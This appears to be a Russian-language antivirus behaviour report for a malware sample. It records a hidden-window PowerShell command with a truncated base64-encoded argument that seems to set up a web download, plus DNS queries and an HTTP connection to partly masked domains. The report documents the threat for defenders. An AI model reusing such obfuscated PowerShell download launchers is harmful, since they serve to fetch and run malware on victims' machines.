Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADUAMwBfADkAMgBfAD0AKAAnAGYAJwArACcAMwAxADIAJwArACcAMwAwAF8ANQAnACkAOwAkAEcAOAA3ADAAMgAxADIAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBfADEANwA2ADIAMQA4AD...
- 'ke###afzoon.com':80
- DNS ASK me###rox.com
- DNS ASK bo##r.com
- DNS ASK cl###stan.com
- DNS ASK ul#o.tv
- DNS ASK ke###afzoon.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADUAMwBfADkAMgBfAD0AKAAnAGYAJwArACcAMwAxADIAJwArACcAMwAwAF8ANQAnACkAOwAkAEcAOAA3ADAAMgAxADIAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBfADEANwA2ADIAMQA4AD...' (со скрытым окном)